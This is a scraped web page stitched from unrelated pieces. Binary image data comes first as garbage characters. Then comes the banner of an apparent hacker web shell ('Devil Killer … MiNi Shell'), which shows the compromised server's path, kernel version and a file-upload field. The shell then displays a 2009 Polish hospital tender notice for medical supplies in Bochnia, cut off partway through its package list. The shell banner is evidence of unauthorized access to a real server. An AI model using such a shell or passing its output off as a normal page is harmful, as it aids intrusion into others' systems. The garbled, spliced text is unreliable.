JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090807/271616-N-2009.html

<p class="kh_header"><b>Bochnia: Dostawa wraz z dostarczaniem materiałów medycznych dla SP ZOZ w Bochni Szpital Powiatowy</b><br>
<b>Numer ogłoszenia: 271616 - 2009; data zamieszczenia: 07.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni "Szpital Powiatowy" , Ul. Krakowska 31, 32-700 Bochnia, woj. małopolskie, tel. 014 6153201, 6153233, 50979196, faks 014 6153202.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wraz z dostarczaniem materiałów medycznych dla SP ZOZ w Bochni Szpital Powiatowy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Dostawa wraz z dostarczaniem materiałów medycznych dla SP ZOZ w Bochni Szpital Powiatowy w asortymencie i ilościach podanych w załącznikach według pakietów:

Pakiet nr 1: Opakowania na zużyte igły i strzykawki,
Pakiet nr 2: Ortopedia,
Pakiet nr 3: Rurki intubacyjne, rurki tracheostomijne i ustno-gardłowe,
Pakiet nr 4: Drobny sprzęt medyczny,
Pakiet nr 5: Jałowe opatrunki na oparzenia i urazy,
Pakiet nr 6: Nalepki Toco,
Pakiet nr 7: Sprzęt do żywienia drogą przewodu pokarmowego,
Pakiet nr 8: Papier do drukarki termicznej,
Pakiet nr 9: Szczotki do mycia narzędzi chirurgicznych,
Pakiet nr 10: Części do pneumotachografu,
Pakiet nr 11: Komora nebulizacyjna Pari LC Plus, ustniki,
Pakiet nr 12: Pasta pod elektrody,
Pakiet nr 13: Zestaw do transfuzji wymiennej dla noworodków,
Pakiet nr 14: Igły do znieczuleń,
Pakiet nr 15: Łącznik Y,
Pakiet nr 16: Paski wskaźnikowe,
Pakiet nr 17: Ustniki,
Pakiet nr 18: Uromedium,
Pakiet nr 19: Osłonki na termometr,
Pakiet nr 20: System ssący,
Pakiet nr 21: Zestaw do konikotomii, punkcji,
Pakiet nr 22: Cytoluer,
Pakiet nr 23: Uchwyt do rurek intubacyjnych,
Pakiet nr 24: Łyżki jednorazowego użytku do laryngoskopów światłowodowych,
Pakiet nr 25: Szczypczyki biopsyjne,
Pakiet nr 26: Sensor Y,
Pakiet nr 27: Zestaw do szycia rzepki,
Pakiet nr 28: Obwód oddechowy
Pakiet nr 29: Pokrowce na SCOP
Pakiet nr 30 - Opatrunek do mocowania brzegów ran.
Pakiet nr 31 - Rurki krtaniowe jednorazowe i wielorazowe
Pakiet nr 32 - Rurka metalowa do tchawicy
Pakiet nr 33 - Miski nerkowate
Pakiet nr 34 - Pipeta
Pakiet nr 35 - Opaska przeciwodleżynowa
Pakiet nr 36 - Ciśnieniomierze
Pakiet nr 37- Igły do aspiracji szpiku.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 37.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zgodnie z art. 22 Ustawy Prawa zamówień publicznych, o udzielenie zamówienia, określonego w niniejszej specyfikacji mogą ubiegać się Wykonawcy, którzy:
1.Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i  osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia.
4.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 Ustawy.
1.Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w punkcie Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie warunków udziału w postępowaniu wymienionych w punkcie :Opis warunków udziału w postępowaniu, Wykonawcy powinni załączyć następujące dokumenty i oświadczenia: 
1.Oświadczenie o spełnieniu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 Prawa zamówień publicznych (Dz. U. z 2004 r. Nr19, poz.177 z późn. zm.)  i o nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 P.z.p.
2.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.Aktualne zaświadczenia właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
Uwaga ! Wymagane treści oświadczenia zawarte są w załączniku nr 3 do (SIWZ) - wzór oświadczenia.
Na potwierdzenie, że oferowana dostawa odpowiada wymaganiom określonym przez Zamawiającego, Wykonawca zobowiązany jest do dołączenia do oferty : 
1.Dokumentów dopuszczających oferowany przedmiot zamówienia do obrotu, wynikający z ustawy z dnia 20 kwietnia 2004 r. o wyrobach medycznych (Dz. U. z 2004 r., nr 93, poz. 896), - każdy dokument musi zostać opisany którego pakietu i pozycji dotyczy, lub oświadczenia, że w/w dokument nie jest wymagany-
2.Certyfikaty, deklaracje zgodności CE - każda strona musi zostać opisana którego pakietu i pozycji dotyczy.
3.Katalogi oferowanych produktów zawierające dane określone w wymaganiach dla produktów, potwierdzone za zgodność każda strona musi zostać opisana którego pakietu i pozycji dotyczy.
4.Zamawiający wymaga próbek w każdym pakiecie dla każdej pozycji chyba, że dana próbka jest reprezentatywna dla poszczególnej grupy asortymentu, a różnice wynikają z rozmiarów poszczególnych produktów. W przypadku próbek o wysokiej wartości po zweryfikowaniu czy spełniają  wymogi SIWZ przez Zamawiającego na prośbę  Wykonawcy zostaną zwrócone..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital-bochnia.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni Szpital Powiatowy, ul. Krakowska 31, 32-700 Bochnia, Dział Zaopatrzenia i Zamówień Publicznych.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2009 godzina 11:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni Szpital Powiatowy, ul. Krakowska 31, 32-700 Bochnia, Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1: Opakowania na zużyte igły i strzykawki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem opakowań na zużyte igły i strzykawki w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2: Ortopedia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem ortopedii w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3: Rurki intubacyjne, rurki tracheostomijne i ustno-gardłowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem rurek intubacyjnych, rurek tracheostomijnych i ustno-gardłowych w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4: Drobny sprzęt medyczny,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem drobnego sprzętu medycznego w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5: Jałowe opatrunki na oparzenia i urazy,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem jałowych opatrunków na oparzenia i urazy,w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6: Nalepki Toco,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem nalepki Toco,,w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7: Sprzęt do żywienia drogą przewodu pokarmowego,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem sprzętu do żywienia drogą przewodu pokarmowego,w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8: Papier do drukarki termicznej,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem papieru do drukarki termicznej w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9: Szczotki do mycia narzędzi chirurgicznych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem szczotki do mycia narzędzi chirurgicznych w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet nr 10: Części do pneumotachografu,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem części do pneumotachografu w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet nr 11: Komora nebulizacyjna Pari LC Plus, ustniki,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem komora nebulizacyjna Pari LC Plus, ustniki,w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet nr 12: Pasta pod elektrody,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  pasty pod elektrody,w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet nr 13: Zestaw do transfuzji wymiennej dla noworodków.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  zestawu do transfuzji wymiennej dla noworodków,w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet nr 14: Igły do znieczuleń.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  igły do znieczuleń,w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet nr 15: Łącznik Y,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  łącznika Y, w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet nr 16: Paski wskaźnikowe,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  pasków wskaźnikowych, w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet nr 17: Ustniki,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  ustników, w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet nr 18: Uromedium.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  uromedium, w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 19: Osłonki na termometr.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  osłonki na termometr, w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet nr 20: System ssący,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  systemu ssącego, w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet nr 21: Zestaw do konikotomii, punkcji.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  zestawu do konikotomii, punkcji, w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pakiet nr 22: Cytoluer,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  cytoluer, w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Pakiet nr 23: Uchwyt do rurek intubacyjnych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  uchwytu do rurek intubacyjnych, w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Pakiet nr 24: Łyżki jednorazowego użytku do laryngoskopów światłowodowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  łyżek jednorazowego użytku do laryngoskopów światłowodowych, w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
